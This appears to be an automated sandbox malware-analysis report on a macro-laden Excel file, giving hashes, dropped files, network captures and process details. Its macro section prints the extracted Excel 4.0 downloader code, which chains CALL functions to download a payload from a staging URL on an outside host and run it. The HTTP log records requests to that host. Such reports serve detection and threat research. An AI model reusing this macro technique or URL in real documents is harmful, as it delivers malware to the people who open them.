                                                                                                                                                    Preview: .U.n.0....?..........C....I?.&..an.L...;..............pz..y..6.^\t..@...0....M.E4H*..b.^........:.6\...#Q.*%.....&.<...+..<..R. /'..R.@....!f..P......o..m...w...*%g.".*..yE....j0Q?z..0eP.G..K.2c.."6.B..Lax.i}.\..Wdpx..m..WV+8..8.7....9l.~..fk..S.n..........a.....V.\W...9^.5w.s.....j%.z........W.T.#:..S....>.....K..@....W.#.....n@.1.*..'...........s. .....:..]....83...K.).mb .da.u....#w...J[7`.p.z..~.......PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\~$request_form_1611306935.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):495
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtBhFXI6dtBhFXI6dtt:RJZhJZhJ1
                                                                                                                                                    MD5:28C0C942161F749E335A76E714AACA29
                                                                                                                                                    SHA1:53D07F227E4A2F3AF5373958409A19DE1FA1CF9C
                                                                                                                                                    SHA-256:BA0AB47EA8285A45E0884C5916C7C3052BE3C5245A0FC350DF4E83B91BC2A3F5
                                                                                                                                                    SHA-512:075F04CF77A30D166E9C04A6376629508A854F9218CEA194EC1D69A65669C51F3A0858697F258AF0DF5954DE02C7EEF2D060B6F69D8194D4D4A95D2C94900DAE
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    C:\msdownld.tmp\AS01997C.tmp\babmboa.php
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:empty
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):0
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3::
                                                                                                                                                    MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                    SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                    SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                    SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview:

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.245499147058293
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                    File name:request_form_1611306935.xlsm
                                                                                                                                                    File size:17127
                                                                                                                                                    MD5:5fd958006a94c6145364c06bbf264d06
                                                                                                                                                    SHA1:d5cc7dc1083508dbe5531db67a3f78866e00330c
                                                                                                                                                    SHA256:f41c4588d2ef8936d9417069a1c5a44833fb2994c60c54bda14b1aac9aa7b83a
                                                                                                                                                    SHA512:a8c80661725284a629ec45f25331ea1349f63f4ea8245ae6c6fb62b9e3ac6114889c6b909c34332acd403ac7f0448a1692165b888aa8f7c4fa0ef8fbb404c0d9
                                                                                                                                                    SSDEEP:384:rNUK4o2aGcnzJTABwiMEx4o9QC32XRRl4Y:JUpaGcPiML8QC32blP
                                                                                                                                                    File Content Preview:PK..........!.................[Content_Types].xml ...(...............!!........................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "request_form_1611306935.xlsm"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,""JCJ"",'Doc2'!AD15,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,""JCJ"",'Doc2'!AD15&'Doc2'!AD19,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,""JJCCJJ"",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""INSENG"",""DownloadFile"",""BCCJ"",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,""JJCCCCJJ"",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(Q1),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://jvdattorney.com/stager/babmboa.php,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 22, 2021 11:46:43.850178957 CET4971680192.168.2.3162.241.225.18
                                                                                                                                                    Jan 22, 2021 11:46:44.018779039 CET8049716162.241.225.18192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:44.018928051 CET4971680192.168.2.3162.241.225.18
                                                                                                                                                    Jan 22, 2021 11:46:44.020159960 CET4971680192.168.2.3162.241.225.18
                                                                                                                                                    Jan 22, 2021 11:46:44.188584089 CET8049716162.241.225.18192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:44.451824903 CET8049716162.241.225.18192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:44.452049971 CET4971680192.168.2.3162.241.225.18
                                                                                                                                                    Jan 22, 2021 11:46:44.491180897 CET4971680192.168.2.3162.241.225.18
                                                                                                                                                    Jan 22, 2021 11:46:44.659750938 CET8049716162.241.225.18192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:44.969109058 CET8049716162.241.225.18192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:44.969269991 CET4971680192.168.2.3162.241.225.18
                                                                                                                                                    Jan 22, 2021 11:46:49.969836950 CET8049716162.241.225.18192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:49.969914913 CET4971680192.168.2.3162.241.225.18
                                                                                                                                                    Jan 22, 2021 11:47:19.969835043 CET8049716162.241.225.18192.168.2.3

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 22, 2021 11:46:29.357741117 CET53641858.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:30.250514030 CET6511053192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:30.298774958 CET53651108.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:31.352744102 CET5836153192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:31.409552097 CET53583618.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:32.573880911 CET6349253192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:32.624667883 CET53634928.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:33.970380068 CET6083153192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:34.021138906 CET53608318.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:39.761533022 CET6010053192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:39.825978041 CET53601008.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:40.712891102 CET5319553192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:40.760795116 CET53531958.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:41.132091999 CET5014153192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:41.191463947 CET53501418.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:42.138147116 CET5014153192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:42.197272062 CET53501418.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:43.152982950 CET5014153192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:43.217340946 CET53501418.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:43.706247091 CET5302353192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:43.848256111 CET53530238.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:43.938977003 CET4956353192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:43.986840010 CET53495638.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:45.145550013 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:45.165976048 CET5014153192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:45.193463087 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:45.224885941 CET53501418.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:46.391350031 CET5934953192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:46.439323902 CET53593498.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:47.502361059 CET5708453192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:47.558892965 CET53570848.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:48.693598032 CET5882353192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:48.741473913 CET53588238.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:49.181998968 CET5014153192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:49.241058111 CET53501418.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:50.143279076 CET5756853192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:50.191530943 CET53575688.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:51.619292021 CET5054053192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:51.683568954 CET53505408.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:46:57.840711117 CET5436653192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:46:57.888685942 CET53543668.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:47:02.693780899 CET5303453192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:47:02.751976013 CET53530348.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:47:08.629539013 CET5776253192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:47:08.687330008 CET53577628.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:47:18.617120028 CET5543553192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:47:18.687684059 CET53554358.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:47:34.433465958 CET5071353192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:47:34.484159946 CET53507138.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:47:37.654282093 CET5613253192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:47:37.715204954 CET53561328.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:48:09.310009003 CET5898753192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:48:09.358670950 CET53589878.8.8.8192.168.2.3
                                                                                                                                                    Jan 22, 2021 11:48:10.839138031 CET5657953192.168.2.38.8.8.8
                                                                                                                                                    Jan 22, 2021 11:48:10.907335043 CET53565798.8.8.8192.168.2.3

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Jan 22, 2021 11:46:43.706247091 CET192.168.2.38.8.8.80x2a84Standard query (0)jvdattorney.comA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Jan 22, 2021 11:46:43.848256111 CET8.8.8.8192.168.2.30x2a84No error (0)jvdattorney.com162.241.225.18A (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • jvdattorney.com

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349716162.241.225.1880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 22, 2021 11:46:44.020159960 CET108OUTGET /stager/babmboa.php HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: jvdattorney.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Jan 22, 2021 11:46:44.451824903 CET113INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 22 Jan 2021 10:46:44 GMT
                                                                                                                                                    Server: nginx/1.19.5
                                                                                                                                                    Content-Type: application/force-download
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Cache-control: private
                                                                                                                                                    Content-Disposition: attachment; filename=
                                                                                                                                                    Cache-Control: max-age=21600
                                                                                                                                                    Expires: Fri, 22 Jan 2021 16:46:44 GMT
                                                                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                    X-Server-Cache: true
                                                                                                                                                    X-Proxy-Cache: MISS
                                                                                                                                                    Jan 22, 2021 11:46:44.491180897 CET113OUTGET /stager/babmboa.php HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: jvdattorney.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Jan 22, 2021 11:46:44.969109058 CET120INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 22 Jan 2021 10:46:44 GMT
                                                                                                                                                    Server: nginx/1.19.5
                                                                                                                                                    Content-Type: application/force-download
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Cache-control: private
                                                                                                                                                    Content-Disposition: attachment; filename=
                                                                                                                                                    Cache-Control: max-age=21600
                                                                                                                                                    Expires: Fri, 22 Jan 2021 16:46:44 GMT
                                                                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                    X-Server-Cache: true
                                                                                                                                                    X-Proxy-Cache: MISS


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:11:46:39
                                                                                                                                                    Start date:22/01/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x3a0000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Reset < >